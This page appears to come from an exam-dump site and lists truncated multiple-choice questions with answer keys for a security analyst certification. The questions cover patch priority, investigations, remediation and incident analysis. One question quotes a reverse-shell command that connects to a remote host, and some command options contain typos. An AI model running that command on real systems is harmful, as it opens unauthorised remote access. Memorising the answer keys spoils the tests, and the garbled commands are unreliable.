- All Exams Instant Download
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
The Company shall prioritize patching of publicly available systems and services over patching of internally available system. According to the security policy, which of the following vulnerabilities should be the highest priority to patch? A) B) C) D) A . Option AB . Option BC . Option CD . Option...
When starting an investigation, which of the following must be done first?
When starting an investigation, which of the following must be done first?A . Notify law enforcementB . Secure the sceneC . Seize all related evidenceD . Interview the witnessesView AnswerAnswer: B Explanation: The first thing that must be done when starting an investigation is to secure the scene. Securing the...
Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to...
Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company...
Which of the following security controls would best support the company in this scenario?
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?A . Implement step-up authentication for administratorsB . Improve employee training and...
Which of the following is being attempted?
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?A . RCEB . Reverse shellC . XSSD . SQL injectionView AnswerAnswer: B Explanation: A reverse shell is a type of shell access that allows a remote user...
Which of the following commands should the administrator run next to further analyze the compromised system?
A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output: Which of the following commands should the administrator run next to further analyze the compromised system?A . gbd /proc/1301B . rpm -V openssh-serverC . /bin/Is -1 /proc/1301/exeD . kill -9...
Which of the following most likely describes the observed activity?
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?A . There is an issue with the SSL certificate causinq port...
Which of the following most likely describes the observed activity?
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?A . There is an issue with the SSL certificate causinq port...
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?A . Mean time to detectB . Number of exploits by tacticC . Alert volumeD . Quantity of intrusion attemptsView AnswerAnswer: A Explanation: Mean time to detect...
